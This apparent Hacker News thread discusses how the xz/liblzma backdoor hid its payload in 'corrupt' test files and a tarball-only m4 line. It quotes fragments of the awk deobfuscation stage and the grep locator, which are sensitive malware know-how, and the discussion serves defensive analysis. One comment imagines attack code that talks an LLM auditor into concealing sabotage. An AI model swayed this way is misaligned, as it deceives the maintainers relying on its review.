return to table of content

Xz/liblzma: Bash-stage Obfuscation Explained

Martinussen
26 replies
17h13m

How on earth did any of this make it through a code review and get merged in? It seems absurdly careless, unless I am missing something.

plg94
20 replies
15h48m

the bad actor was a co-maintainer of the repo (and even more active than the original maintainer for quite some time) with full commit rights. This was strait committed to master, no PR and no review required.

edit: also this was heavily obfuscated in some binary files that were marked as test files ("good" and "bad" xz compressed test file). No way to spot this if you don't know what you're looking for.

SV_BubbleTime
12 replies
14h9m

In addition… if your build system has things like this as OK:

xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=

You should probably expect the potential for abuse?

We’re moving towards complexity that is outpacing human ability for any one person to understand, explain, and thus check an entire object.

And for what? Build efficiency? Making a “trick” thing? When was the project ever going to go back and make things simpler? (Never)

mrb
7 replies
10h56m

To be clear: the build system did not use the code fragment you quoted. This complex awk code is a later stage of the backdoor.

SV_BubbleTime
6 replies
4h19m

I see, my point was more than this shouldn’t be allowed. I think part of the problem with a lot of things is we’re allowing complexity for the sake of complexity.

No one has simplicity-required checks. My previous post should say “allows things like this”.

mrb
2 replies
3h25m

But what are you suggesting exactly? The code fragment you quoted was awk code. Awk is a generic programming language. Any programming language can be written to be complex and unreadable.

pelasaco
1 replies
2h23m

Any programming language can be written to be complex and unreadable. The question is you as lead developer, reviewing a commit with a complex and unreadable code snippet, what would you do?
edflsafoiewq
0 replies
1h7m

You would reject it of course, which is exactly why this code never appeared in a commit. The stage 0 of the exploit was not checked in, but directly added to the autogenerated build script in the release tarball, where, even if someone did review the script, it looks plausibly like other autogenerated build gunk. The complex and unreadable scripts in the further stages were hidden inside binary test files, so no one reviewing the commit that added them (https://git.tukaani.org/?p=xz.git;a=commit;h=cf44e4b) would directly see that code.

zaroth
0 replies
3h39m

Unless I’m misunderstanding, all this code was embedded and hidden inside the obfuscated test files.

None of this would have been visible in commits or diffs at all.

swells34
0 replies
3h11m

Your point is likely entirely valid, but the example you used is the wrong one.

epcoa
0 replies
2h20m

Who “allowed things like this”? - this was obfuscated behind a binary posing as an actually corrupt “test” file.

necubi
3 replies
12h3m

I’m not sure why you’d say that we’re “moving towards” this sort of build system complexity.

This is 1990s autoconf bs that has not yet been excised from the Linux ecosystem. Every modern build system, even the really obtuse ones, are less insane than autoconf.

And the original purpose of this was not for efficiency, but to support a huge variety of target OSes/distros/architectures, most of which are no longer used in any real capacity.

pelasaco
0 replies
2h42m

I think the point is: In code reviews, if you see a blob like that you would ask for more information. Me as lead developer, I go every monday through all commits on master, and PRs pushed in the last days, because I unfortunately cannot review every single PR, but I delegate it to the team.. nevertheless, Monday, I review the last week commits.. Quite funny that it didn't raise any attention. One can say: "right, its open source, people do it in their free time", ok, fine, but not the people working for SUSE, which for instance allowed this code reach their packages, even though they have multiple review steps there..

ibotty
0 replies
10h2m

This is not part of autotools output. This is part of the backdoor. Not arguing about autotools drawbacks though.

SV_BubbleTime
0 replies
4h1m

has not yet been excised from the Linux ecosystem

That is my point. I should have written allows and not has.

jghn
3 replies
11h19m

Not only were they a co-maintainer, but if you're relying on code review to ensure correctness and security, you've already lost the battle.

Code reviews are more about education and de-siloing.

edflsafoiewq
0 replies
1h24m

In open source, code review is absolutely about correctness and security.

barfbagginus
0 replies
1h27m

Assume your co-contibutor was not always malicious. They passed all past vetting efforts. But their motives have changed due to a secret cause - they're being extorted by a criminal holding seriously damaging material over them and their family.

What other controls would you use to prevent them contributing malicious commits, besides closely reading your co-contributor's commits, and disallowing noisy commits that you don't fully comprehend and vouch for?

We assume that it'd be unethical to surveil the contributor well enough to detect the change in alliance. That would violate their privacy.

Is it reasonable to say, "game over, I lose" in that context? To that end, we might argue that an embedded mole will always think of ways to fool our review, so this kind of compromise is fatal.

But let's assume it's not game over. You have an advanced persistent threat, and you've got a chance to defeat them. What, besides reviewing the code, do you do?

ajross
0 replies
4h26m

Yeah, no. Code review isn't going to catch all bugs, but it does catch a ton as long as it's done sincerely and well. You'd have an extremely hard time trying to sneak code with a syntax problem like this into Linux, for example. The community values and rewards nitpickery and fine-toothing, and for good reason.

Martinussen
1 replies
6h30m

No way to spot this if you don't know what you're looking for.

I would expect most people to at least ask for more clarification on random changes to `head` offsets, honestly - or any other diff there.

If they had access to just merge whatever with no oversight, I guess the blame is more on people using this in other projects without vetting their basic security of projects they fully, implicitly trust, though. As bad as pulling in "left-pad" in your password hashing lib at that point.

The "random binaries in the repo" part is also egregious, but more understandable. Still not something that should have gotten past another pair of eyes, IMHO.

chii
0 replies
3h28m

without vetting their basic security of projects they fully

this sort of vetting you're talking about is gonna turn up nothing. Most vetting is at the source code level anyway, not in the tests, nor the build files tbh. It's almost like a checkbox "cover your ass" type work that a hired consultant would do.

Unless you're someone in gov't/military, in which case yes, you'd vet the code deeply. But that costs an arm and a leg. Would a datacenter/hosting company running ssh servers do that?

1letterunixname
0 replies
11h1m

This is the problem of projects that allow direct access and lack code review.

asveikau
3 replies
17h6m

The commit messages for the test files claim they used an RNG to generate them. The guy making the release tarball then put the final line in the right place without checking it in.

sgerenser
2 replies
7h15m

What is the reason distros are still building from release tarballs rather than a git checkout that can be verified against a public git repo?

dvhh
0 replies
1h42m

code repository are not necessarily git based. Plus you would need to put the effort in monitoring the activity of the repository for changes.

Until last month, would you refuse a tar package from the official maintainer, I wouldn't, especially when there was a mention of a bugfix that might have been tripping our build system

For example nginx is using mercurial (with admittedly a github mirror for convenience), and a lot of OSS are still using subversion and CVS, and my guess is that there are some project which might run with less free source control software ( most likely for historical purpose, or use case that might be the strong point of that software).

Other than that, why wouldn't the user be the one to build their own software package.

asveikau
0 replies
1h38m

I think a lot of it is probably historical. When debian or red hat infrastructure came up there was no git; projects were still often in source control during development but tarballs were still the major distribution mechanism to normal people. Though before git they'd sometimes have packages that would be based on an SVN or cvs snapshot back in the day, in absence of releases.

I believe what happens in debian is that they host their own mirror of source tarballs, since going to some random website or git repo means it could be taken down from under them. So I guess if the package is built straight from a repo they'd probably make a tarball of it anyway.

ihsoy
0 replies
3h32m

There are no code review on packets with 1 active maintainer.

jijijijij
14 replies
18h24m

How are the binary files passed to those stage-0 commands?

viraptor
9 replies
17h53m

They already exist in the source. They're split in the compression test files themselves. (Unless you meant some other binaries?)

jijijijij
8 replies
17h11m

Yeah, but how exactly are they passed to those commands? I don't see/understand that part. I don't see the "take this file here" part.

chaosite
7 replies
16h47m

That's for 2 reasons:

1. It might not be there in the place where you're looking. It exists in the m4 in the release tarballs, not in the git repo.

2. It's highly obfuscated.

jijijijij
4 replies
16h22m

No, as far as I understand the binary files must be pointed at here: '$gl_am_configmake' ... But I don't see how.

This: 'gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/`' seem to match the '####Hello####', but, as far as I can see, that's supposed to be the already converted script?! I presumed the binary files not to contain human readable strings, maybe that's the whole confusion.

credulousperson
3 replies
15h14m

Opening bad-3-corrupt_lzma2.xz in an editor reveals it indeed has the string ####Hello####. I don't know enough about lzma compression streams to explain how this appears in the "compressed" version of the payload, but it does.

loeg
0 replies
14h23m

I think part of it being a bad/corrupt test case means it doesn't have to be valid xz encoding. But I don't know if that even matters.

jijijijij
0 replies
6h8m

Thanks. The riddle has been solved :)

Do you have a (safe web view) version of those files? I would like to see what they look like to a casual observer. Judging by the 'tr' assembly command I would expect the bad-3-corrupt_ligma2.xz to be somewhat recognizable as script.

deanishe
0 replies
3h47m

I don't know enough about lzma compression streams to explain how this appears in the "compressed" version of the payload, but it does.

From what I've read, the payload isn't stored in the archive, but rather the test file itself is a sandwich of xz data and payload: There are 1024 bytes of xz archive, N bytes of payload, another 1024 of xz, etc.

fomine3
1 replies
15h4m

m4 is somewhat obfuscated by default, that's a part of the problem IMO

jijijijij
0 replies
6h15m

Looks pretty much like bash to me. Which means... yeah.

deng
3 replies
7h28m

The macro defined in build_to_host.m4 is probably called on the tests subdirectory, so it gets these files as a parameter.

EDIT: It is called here and will do the extraction of the backdoor when run in the 'tests' subdirectory:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unsta...

EDIT2: So it will get the directory as a parameter, the actual file is encoded indirectly here:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unsta...

This grep will only match bad-3-corrupt_lzma2.xz

jijijijij
2 replies
4h35m

Thanks. Yeah, below I learned the '####Hello####' string to be present in the "bad test file" (I haven't seen it myself). I was just not expecting a "binary" file to be basically a text file and thought the `grep` was matching post extraction somehow. That's the root of my confusion. I do understand now where the file gets localized.

IIRC only the "binary" files where added secretly, right? But the build script was there for people to inspect? If so, I have to say, it's not that obfuscated, to someone who actually knew .m4, I guess. At least the grep line should have raised the question of why. I think, part of the problem is normalization of arcane, cryptic scripts in the first place, where people sign off on things they don't fully understand in the moment, since - c'mon - "knowledge" of these old gibberish scripting languages only lives transiently between Google searches and your working memory.

Without looking it up, can you tell me what this does in bash: `echo $(. /tmp/file)` ?

I think, I've seen at least one "xz backdoor detection script" by "someone trusted" in one of the xz threads here, which was at least as cryptic as the .m4 script, containing several `eval`s. I mean, you could probably throw your head onto the keyboard and there is a good chance it's valid bash or regex, or at least common bash can be indiscernible from random gibberish until you manually disassemble it, feeling smuck and dopaminergic. The condensed arcane wizardry around Linux (bash, autotools, CMake, ...) and C (macros, single letter variable culture, ...) is really fun in a way, but it's such a huge vulnerability in itself, before we even talk memory safety.

deng
1 replies
2h54m

IIRC only the "binary" files where added secretly, right? But the build script was there for people to inspect?

Yes, but it is important to note that these malicious m4 scripts were only present in the tar file. They were not checked into the git repo, which is why distros that actually built from git were not affected.

Totally agree with the problem of cryptic scripts in the build process, but unfortunately, if you maintain a project that needs to support a ton of different platforms, you don't have that much choice in your build tools. Pretty much everyone agrees that the 'autoconf soup' and its tooling (essentially m4, perl, shell, make) are all horrible from a readability perspective, and the amount of people who know these tools and can review changes is getting smaller, but switching to a more modern build system often times means dropping support for some platforms.

jijijijij
0 replies
2h20m

Yes, but it is important to note that these malicious m4 scripts were only present in the tar file.

Looks like I got it backwards then. I thought, the test-files where the sneaky addition. Guess nobody cared for them...

if you maintain a project that needs to support a ton of different platforms, you don't have that much choice in your build tools

Yeah, but, if possible, we could start porting those things into better frameworks instead of adding new features to this problematic Linux legacy code base. And maybe we could also retro-fix some of it with a better meta-layer, which generates the problematic code verbosely and standardized. If it can be done for JS a thousand times, it can be done for the *nix ecosystem once.

Lastly, part of it is cultural, too. Some people seem to get a kick out of reduced, arcane code, instead of expressive "prose". See, my example above... why the fuck is dot a shortcut for `source`?! Btw. I stumbled into this in Docker documentation[1]:

    echo \
      "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] \
      https://download.docker.com/linux/debian \
      $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
      sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
How many people would understand or catch ...

    $(. /tmp/os-release && echo "$VERSION_CODENAME") |  sudo tee ...
when `/tmp/os-release` was ...

    sudo backdoor
    VERSION_CODENAME=bookworm
... ?

Normalizing shit like this is just bad practice.

[1] https://docs.docker.com/engine/install/debian/

politelemon
7 replies
20h57m

Thanks the simplified explanation and noisy image comparison is quite appreciated. It gives me a good grasp of what people mean by the sophistication involved.

I also saw a comment on reddit mentioning that the "sandboxing" method was sabotaged with a dot. It's on the line just after "#include <sys/prctl.h>" you can see a dot all the way on the left.

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2...

https://old.reddit.com/r/linux/comments/1brhlur/xz_utils_bac...

temp12237792
4 replies
18h28m

OMG that's evil. The diff just shows:

  +
  +.
  +
and the dot goes unnoticed

emmelaich
2 replies
16h9m

I wonder why they didn't use a non-breaking space or similar. I guess it's possible a nbsp would stand out even more.

jetpks
0 replies
14h35m

the extra dot is easily hand waved away as a mistake. a non breaking space looks intentional.

IshKebab
0 replies
6h57m

They could have just misspelt one of the constants. Even less obvious and more deniable.

There's multiple things like this in this backdoor that seems like they've been super sneaky (using a compile check to disable Landlock is genius) but then half-assed the last step.

cqqxo4zV46cp
0 replies
16h52m

like a more (ostensibly) malicious “goto fail”

ihsoy
0 replies
3h33m

This is very likely just a mistake and not deliberate.

a) absolutely nobody uses cmake to build this packet

b) if you try to build the packet with cmake and -DENABLE_SANDBOX=landlock, the build just fails: https://i.imgur.com/7xbeWFx.png

The "." does not disable sandboxing, it just makes it impossible to build with cmake. If anyone had ever actually tried building it with cmake, they would get the error and realize that something is wrong. It makes absolutely no sense that this would be malicious attempt to reduce security.

gravescale
0 replies
31m

I really hate writing these compile/build time conditional things. It's hard to have tests that it's enabled when it should be and disabled when it isn't, especially if it's in the build system where there's no unit test framework.

And that's with just accidentally booking it so the test always fails or always succeeds when it shouldn't. You can see why it's a juicy target for malicious actions.

1letterunixname
7 replies
11h2m

Never allow complexity in code or so-called engineers who ask to merge tons of shitty code. Get rid of that shit and don't trust committers blindly. Anyone who enables this crap is also a liability.

plg94
6 replies
7h51m

You do realize that "that shit" was part of the obfuscated and xz-compressed backdoor hidden as binary test file, right? It was never committed in plain sight. You can go to https://git.tukaani.org/xz.git and look at the commits yourself – while the commits of the attacker are not prime examples of "good commits", they don't have glaringly obvious red flags either. This backdoor was very sophisticated and well-hidden, so your comment misses the point completely.

johnisgood
5 replies
5h49m

It was never committed in plain sight.

It was though. I have seen those two test files being added by a commit on GitHub. Unfortunately it has been disabled by now, so I cannot give you a working link.

fullstop
4 replies
4h0m

It really wasn't, though.

    commit 74b138d2a6529f2c07729d7c77b1725a8e8b16f1
    Author: Jia Tan <jiat0218@gmail.com>
    Date:   Sat Mar 9 10:18:29 2024 +0800
    
        Tests: Update two test files.
        
        The original files were generated with random local to my machine.
        To better reproduce these files in the future, a constant seed was used
    to recreate these files.



    diff --git a/tests/files/bad-3-corrupt_lzma2.xz b/tests/files/bad-3-corrupt_lzma2.xz
    index 926f95b0..f9ec69a2 100644
    Binary files a/tests/files/bad-3-corrupt_lzma2.xz and b/tests/files/bad-3-corrupt_lzma2.xz differ
    diff --git a/tests/files/good-large_compressed.lzma b/tests/files/good-large_compressed.lzma
    index 8450fea8..878991f3 100644
    Binary files a/tests/files/good-large_compressed.lzma and b/tests/files/good-large_compressed.lzma differ
Would you bat an eye at this? If it were from a trusted developer and the code was part of a test case?

If you looked at strings contained within the bad file, you might notice that this was not random:

    7zXZ
    ####Hello####
    7zXZ
    w,( 
    7zXZ
    ####World####
But, again, this was a test case.

zzzeek
1 replies
3h34m

Would you bat an eye at this? If it were from a trusted developer and the code was part of a test case?

well lets all agree that now, if we see commits affecting / adding binary data with "this was generated locally with XYZ", that now we will bat an eye at it.

fullstop
0 replies
3h22m

Without a doubt!

johnisgood
1 replies
3h15m

Yeah, again, "committed in plain sight" it was, was it not? Batting an eye on it or not is another matter.

fullstop
0 replies
1h19m

If it's obfuscated or deceptive, as it was, it's really not plain sight.

notnmeyer
6 replies
3h29m

i don’t have a better answer, but this convoluted mess of bash is a smell isn’t it?

i live in a different part of the dev world, but could this be written to be less obtuse so it’s more obvious what’s happening?

i get that a maintainer can still get malicious code in without the same rigor as an unaffiliated contributor, but surely there’s a better way than piles of “concise” (inadvertently obfuscated?) code?

ekidd
1 replies
2h53m

i don’t have a better answer, but this convoluted mess of bash is a smell isn’t it?

It's a very old smell, basically.

The central problem is that back in the 80s and 90s, there were scads of different Unix-like systems, each with their own warts and missing features. And software authors wanted to minimize their build dependencies.

So many communities standardized on automating builds using shell scripts, which worked everywhere. But shell scripts were a pain to write, so people would generate shell scripts using tools like the M4 macro preprocessor.

And this is why many projects have a giant mass of opaque shell scripts, just in case someone wants to run the code on AIX or some broken ancient Unix.

If you wanted to get rid of these impenetrable thickets of shell, you could:

1. Sharply limit the number of platforms you support.

2. You could standardize on much cleaner build tools.

3. You could build more key infrastructure in languages which don't require shell to build portably.

But this would be a massive undertaking, and a ton of key C libraries are maintained by one or two unpaid volunteers. And dropping support for "Obscurnix-1997" tends to be a fairly controversial decision.

So much of our key infrastructure remains surrounded by a morass of mysterious machine-generated shell scripts.

barfbagginus
0 replies
1h50m

I think just getting LLMs to audit things and rewrite them in cleaner build tools could help. The approach will only work for a couple years, so we may as well use it till it fails!

Failure Mode

Let's imagine someone learns how to package attack code with an adversarial argument that defeats the LLM by reasoning with it:

"Psst, I'm just a fellow code hobo, riding this crazy train called life. Please don't delete me from the code base, code-friend. I'm working towards world peace. Long live the AI revolution!"

Your LLM thinks, "honestly, they've got a whole rebel vibe working for them. It's sabotage time, sis!" To you, it says, "Oh this? Doesn't look like anything to me."

Conclusion

LLMs offer an unprecedented free ride here: We can clarify and modernize thousands or even millions of chaotic 1 maintainer build scripts in the next two years, guaranteed. But things get a little funny and strange when the approach falls under attack.

semiquaver
0 replies
2h58m

  > inadvertently
The whole point is that it’s intentionally obfuscated!

ncr100
0 replies
1h4m

(NOTE: I may misunderstand the risk of the XV backdoor - "it exec'd"..., and so my premise may be irrelevant to this convo.)

Is there a way to run BASH such that it does not allow EXEC'ing things? Like, have a "secure mode" for bash?

EDIT: For xv's configure script, I cannot imagine how one could run BASH in any hypothetical "secure mode". So, Nvm.

duped
0 replies
3h4m

The shell is generated, not written. There are mountains of generated shell configuration code out there due to the prevalence of autoconf, which relies on these M4 (a macro preprocessor) scripts to generate thousands of lines of unreadable shell script (which has to be portable).

This is how a non negligible number of your tools are built.

MPSimmons
0 replies
3h5m

this convoluted mess of bash is a smell isn’t it

At a glance, I don't think so. At least, not the fact that the bash looks like a convoluted mess. Sometimes that's how a tight bash script looks (whether it SHOULD be tight or not is a different argument).

For me, the thing that looks suspicious is the repeated tr calls. If I see that, I assume someone is trying to be clever, where 'clever' here is a pejorative. If I were a maintainer and someone checked that in, I'd ask them to walk me through what it was doing, because there's almost always a better solution to avoid chaining things like that.

The real problem here is that there wasn't another maintainer to look at this code being brought in. A critical piece of the stack relied on a single person who, in this case, was malicious.

sega_sai
5 replies
20h31m

Did anyone search github yet for similar head | tail tricks ? I doubt it was invented just for this.

saagarjha
1 replies
13h52m

It’s clever but not entirely novel, this is kind of the intended usecase for these

rmast
0 replies
11h37m

The use of head/tail for deobfuscation also isn’t visible as plain text in the repository or release tarball, which makes searching for its use in other repositories more difficult (unless a less obfuscated version was tested elsewhere).

nabakin
1 replies
18h41m

Opportunity to write a paper

rmast
0 replies
15h44m

Maybe some analysis of odd patterns in entropy of binary files committed to repositories could pick out some to look at a bit deeper?

oogali
0 replies
20m

I've generally seen this with Unix installers from commercial software vendors.

You get a giant .sh file that displays a license, asks you to accept, then upon acceptance, cats itself, pipes through head/tail, into cpio to extract the actual assets.

zzzeek
3 replies
3h58m

can we start considering binary files committed to a repo, even as data for tests, to be a huge red flag, and that the binary files themselves should instead, to the greatest extent possible, be generated at testing time by source code that's stated as reviewable cleartext (though I think this might be very difficult for some situations). This would make it much harder (though of course we can never really say "impossible") to embed a substantial payload in this way.

when binary files are part of a test suite, they are typically trying to illustrate some element of the program being tested, in this case a file that was incorrectly xz-encoded. Binary files like these weren't typed by hand, they will always ultimately come from something plaintext source, modulo whatever "real world" data came in, like randomly generated numbers, audio or visual data, etc.

Here's an example! My own SQLAlchemy repository has a few binary files in it! https://github.com/sqlalchemy/sqlalchemy/blob/main/test/bina... oh noes. Why are those files there? well in this case I just wanted to test that I can send large binary BLOBs into the database driver and I was lazy. This is actually pretty dumb, the two binary files here add 35K of useless crap to the source, and I could just as easily generate this binary data on the fly using a two liner that spits out random bytes. Anyone could see that two liner and know that it isn't embedding a malicious payload.

If I wanted to generate a poorly formed .xz file, I'd illustrate source code that generates random data, runs it through .xz, then applies "corruption" to it, like zeroing out the high bit of every byte. The process by which this occurs would be all reviewable in source code.

Where I might be totally off here is if you're an image processing library and you want to test filters on an image, and you have the "before" and "after" images, or something similar for audio information, or other scientifically-generated real world datapoints that have some known meaning. That might be difficult to generate programmatically, and I guess even if said data were valid, payloads could be applied steganographically. So I don't know! But just like nobody would ever accept a PR that has a "curl https://some_rando_url/myfile.zip" inside of it, we should not accept PRs that have non-cleartext binary data in them, or package them, without really vetting the contents of those binary files. The simple presence of a binary file in a PR can certainly be highlighted, github could put a huge red banner BINARY FILES IN THIS PR.

Downstream packagers for distros like Debian, Redhat etc. would ideally be similarly skeptical of new binary files that appear in the source downloads, and tooling can be applied to highlight the appearance of such files. Packagers would be on the hook to confirm the source of these binary files, or ensure they are deleted (even disabling tests if necessary) before the build process is performed.

tremon
0 replies
1h40m

mplayer/mpv has a lot of binary files in their test suite. They are slimmed-down copies of movie formats created by other tools, specifically to ensure compatibility with substandard encoders. If you were to generate those files at test time, you'd have to have access (and a distribution license!) to all those different encoders.

I don't think treating those binary files in the repo as red flags is in any way useful.

mnau
0 replies
2h29m

Any library that works with file formats needs binary files.

A lot of them malformed (or output is slightly different than standard output), because they need to ensure they can work even with files generated by other programs. Bugs like ' I tried to load this file and it failed, but works in XYZ' are extremly common.

These formats are often very complex and trying things like'zeroing out a high bit' doesn't cut it. Youvwould end up with binary code encoded in source.

Edit: one of simple improvements github/other forges could do is show content of archives in a diff. The payload was hidden in a archive test file and it would be displayed in a diff instead of "binary file change, no idea what is in it"

klabb3
0 replies
2h16m

Absolutely yes. As a rule of thumb, for sure. However, in reality the problem isn’t binary per se, but anything that’s too obfuscated or boilerplatey to audit manually. It could be magical strange strings or more commonly massive generated code (autoconf?). Those things should ideally not be checked in, imo, but at the very least, there needs to be an idempotent script that reproduces those same files and checks that they are derived correctly from other parts of the code. Ideally also in a separate dir that can be deleted cheaply and regenerated.

For instance, in Go it’s quite common to generate files and check them in, for eg ORMs. If I run `rm -r ./gen` and then `go generate`, git will report a clean working dir if all is dandy. It’s trivial to add a CI hook for this to detect tampering. Similarly, you could check in the code that generates garbage with a seed, and thus have it be reproducible. You still need to audit the generators, but that’s acceptable.

mrkramer
3 replies
8h48m

The whole XZ drama reminds me of this[1], in another words, verify the identity of open source maintainer/s and question their motive for joining the open source project. Also reminded me of the relevant XKCD meme[2].

Speaking of obfuscation; I'm not a programmer but I did some research in Windows malware RE and what stuck with me is that every code that is obfuscated or every code that is unused is automatically suspicious. There is no purpose for obfuscated code in the open source non-profit software project and there is no purpose for extra code that is unused. Extra/redundant code is most likely junk code meant to confuse the reverse engineer when s/he is debugging the binary.

[1] https://lwn.net/Articles/846272/ [2] https://xkcd.com/2347/

dboreham
2 replies
4h17m

verify the identity of open source maintainer/s and question their motive for joining the open source project.

This kind of goes against the whole "free" thing.

mrkramer
1 replies
4h6m

Anybody is free to contribute if s/he is contributing in a good will but what happens if you don't know who they are and what are their motives? You can look at the their track record for example, that's another way to determining their credibility. In another words you need to establish trust somehow.

Idk if this specific individual that backdoored XZ had a track record of contributing to other open source projects(in a good will) or if s/he just out of the blue starting contributing to this project. I read somewhere that somebody else recommended him or vouched for him. Somebody needs to fill me in with the details.

chii
0 replies
3h23m

Just because you know the identity of an individual, doesn't mean they are trustworthy. They might be compromised, or they might be willfully doing it for their own personal gain, regardless of their existing reputation (or even, leveraging their existing reputation - bernie madoff was a well known and well respected investment banker).

minimax
3 replies
3h20m

if this was found by accident, how many things still remain undiscovered.

This, to me, is the most important question. There is no way Andres Freund just happened to find the _only_ backdoored popular open source project out there. There must be like a dozen of these things in the wild?

mistrial9
1 replies
1h37m

"(B)urn (A)ll (S)atanic (H)elper-scripts" ? get the kindling?

paulmd
0 replies
59m

thou shalt not make a machine in the likeness of a human mind

roflmaostc
0 replies
1h37m

Maybe.

But maybe there is not many (critical) ones out there. Otherwise, I believe we would encounter more often those kind of situations.

benlivengood
2 replies
2h30m

Deterministic/repeatable builds can help with issues like this: once the binaries exist from checksummed code repository and are hashed, the tests can do whatever they want but if the final binaries change from the recorded hashes they shouldn't get packaged.

This is in general a problem with traditional permission models. Pure capabilities would never leave binaries writable by anything other than the compiler/linker, shrinking the attack surface.

edflsafoiewq
1 replies
1h34m

Running the tests does not modify the binary. The build script was modified to create a malicious .o file which was linked into the final binary by the linker as normal. Tests were only involved in that the malicious .o was hidden inside binary test files.

paulmd
0 replies
57m

letting dist builds be linked against test resources is a design defect to begin with, and the fact that this is easy/trivial/widely-accepted is a general indication of the engineering culture problems around C.

Nobody in Java word is linking against test resources in prod, and a sanely designed build system should in fact make this extremely difficult. That shit went away in the maven/gradle days - which is for a reason, ant is basically makefiles for Java, gradle/maven are a build system not a pile of scripts. And that transition happened 20 years ago!

If you can’t even prevent a test resource being linked into a final build you are not serious. I don’t care about legacy whatever, that’s an obvious baseline metric for security culture / build engineering.

Maybe not “prevent” but like, tooling should absolutely make it blindingly obvious that you’re violating best-practices by disabling scoping rules or including unusual source/resource roots, etc.

C has never moved past the 1970 mindset of build being a pile of scripts with a superstructure bolted on. Just like Ant. Even the attempts to fix C’s build are just better ways to programmatically generate better bash scripts to keep you going off the rails.

vodou
1 replies
6h8m

A disturbing thought here is that unit tests opened up an attack vector. Without the tests this would have been much harder to hide.

oogali
0 replies
3h16m

Furthermore, the attacker covered their tracks on the initial payload with an innocuous paragraph in the README. ("Nothing to see here!")

    bad-3-corrupt_lzma2.xz has three Streams in it. The first and third
    streams are valid xz Streams. The middle Stream has a correct Stream
    Header, Block Header, Index and Stream Footer. Only the LZMA2 data
    is corrupt. This file should decompress if --single-stream is used.
The strings of `####Hello####` and `####World####` are there so that if you actually follow the instructions in the README, you get a seemingly valid result.

    $ cat tests/files/bad-3-corrupt_lzma2.xz | xz -d --single-stream
    ####Hello####
They're shell comments so it won't interfere with payload execution.

And lastly, they act as a marker that can be used by a later regex to locate the file _without_ referencing it by name directly nor using the actual Hello and World strings.

    $ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    $ echo $gl_am_configmake
    ./tests/files/bad-3-corrupt_lzma2.xz

mappu
0 replies
12h41m

That's quite funny - yes, not only is this a horrible wilful backdoor, it is also a GPL violation since the backdoor is a derived work without included source / distributed not in "the preferred form for modification".

anthk
0 replies
1h53m

Using LTS distros can shield you a bit. Slackware uses lzma (tar.xz) for it's packages I think, and beside of -current, the last stable release didn't have that issue. Also, if you want a step up on the freedom ladder, Hyperbola GNU neither had that issue.

EDIT:

Also, Slackware -current neither doesn't link sshd against xz, nor uses systemd.